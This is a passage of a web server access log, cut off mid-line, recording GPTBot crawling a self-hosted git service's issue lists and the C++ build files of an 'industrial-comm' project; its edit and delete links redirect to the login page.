"https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&state=all&type=all" -[17/Feb/2026:19:09:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10162] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&state=all&type=all" -[17/Feb/2026:19:09:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10159] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&state=all&type=all" -[17/Feb/2026:19:09:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&sort=latest&state=open&type=all" -[17/Feb/2026:19:09:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10037] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&sort=latest&state=open&type=all" -[17/Feb/2026:19:09:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9999] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&state=all&type=all" -[17/Feb/2026:19:09:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&sort=latest&state=open&type=all" -[17/Feb/2026:19:09:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&project=-1&state=open&type=all" -[17/Feb/2026:19:09:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10158] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&state=all&type=all" -[17/Feb/2026:19:09:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 24525] [Gzip 9.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:19:09:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 11541] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:19:09:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 11283] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build" -[17/Feb/2026:19:09:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:19:09:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:19:09:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:19:09:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:19:09:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10133] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&state=all&type=all" -[17/Feb/2026:19:09:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9954] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:19:09:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10157] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=oldest&state=open&type=all" -[17/Feb/2026:19:09:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 9967] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&state=open&type=all" -[17/Feb/2026:19:09:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10035] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:09:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10166] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&state=all&type=all" -[17/Feb/2026:19:09:18 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:19:09:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:19:09:18 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:19:09:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:19:09:19 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:19:09:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:19:09:20 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:19:09:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:19:09:20 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:19:09:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:19:09:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:19:09:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:19:09:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:19:09:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:19:09:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts?display=source" [Client 74.7.227.38] [Length 11555] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:19:09:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make?display=source" [Client 74.7.227.38] [Length 24541] [Gzip 9.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:19:09:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 9865] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:19:09:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 13188] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:19:09:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 10653] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:19:09:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 17255] [Gzip 5.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:19:09:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 11236] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:19:09:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make?display=rendered" [Client 74.7.227.38] [Length 11330] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:19:09:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts?display=rendered" [Client 74.7.227.38] [Length 11322] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:19:09:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 10108] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:19:09:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 9875] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:19:09:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 965] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:19:09:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10555] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:19:09:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 27144] [Gzip 20.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:19:09:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 10131] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:19:09:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 12141] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles" -[17/Feb/2026:19:09:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 14424] [Gzip 5.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:19:09:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles" -[17/Feb/2026:19:09:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/cpp/CMakeFiles" -[17/Feb/2026:19:09:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 9880] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:19:09:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 10121] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles" -[17/Feb/2026:19:09:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11308] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:19:09:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/Makefile?display=source" [Client 74.7.227.38] [Length 17274] [Gzip 5.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:19:09:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 1497] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:19:09:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr 